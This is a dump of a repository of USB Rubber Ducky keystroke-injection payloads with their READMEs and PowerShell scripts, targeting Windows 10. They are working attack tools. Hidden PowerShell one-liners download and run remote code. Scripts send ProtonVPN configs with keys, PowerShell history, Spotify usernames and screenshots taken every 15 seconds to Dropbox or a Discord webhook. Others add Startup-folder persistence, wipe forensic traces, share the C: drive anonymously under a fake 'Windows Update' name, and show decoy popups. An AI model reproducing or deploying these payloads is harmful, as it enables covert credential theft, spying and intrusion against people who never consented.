================================================ FILE: RubberDucky/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: RubberDucky/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DEFINE TARGET_URL example.com DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Priv-Paths ## Description A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. ## Getting Started ### Dependencies * Discord Webhook or other service that uses webhooks * Windows 10

(back to top)

### Executing program * Plug in your device * Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc ``` wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky DEFINE d YOUR-DISCORD-WEBHOOK DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 500 STRING cd %HOMEPATH% ENTER DELAY 1000 STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ENTER DELAY 1000 STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" d ENTER DELAY 200 STRING del p.txt ENTER DELAY 100 STRING exit ENTER ================================================ FILE: RubberDucky/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. ## Description This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file Then dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DEFINE TARGET_URL example.com DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. " } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: RubberDucky/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive A payload to share the victims "C:" drive to the network. ## Description This payload will share the entire victims "C:" drive to the entire network for further exploitation. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: RubberDucky/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare A payload to prank your friends into thinking their computer got hit with ransomware. ## Description This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter (Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: RubberDucky/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: RubberDucky/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds Then the contents will then be sent to the DropBox for viewing pleasure ## Getting Started ### Dependencies * Pastebin or other file sharing service, Dropbox * Windows 10 * [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: RubberDucky/payloads/Screen-Shock/payload.txt ================================================ REM Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: RubberDucky/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: RubberDucky/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. ## Description Have you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone! ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark A payload to get rid of the ugly windows activation watermark. ## Description This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! ## Getting Started ### Dependencies * Unactivated Windows 10

(back to top)

### Executing program * Plug in your device ``` Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: RubberDucky/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: RubberDucky/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Description This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Define the `DEFINE TARGET_URL example.com` * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: RubberDucky/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DEFINE TARGET_URL example.com DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/placeholder ================================================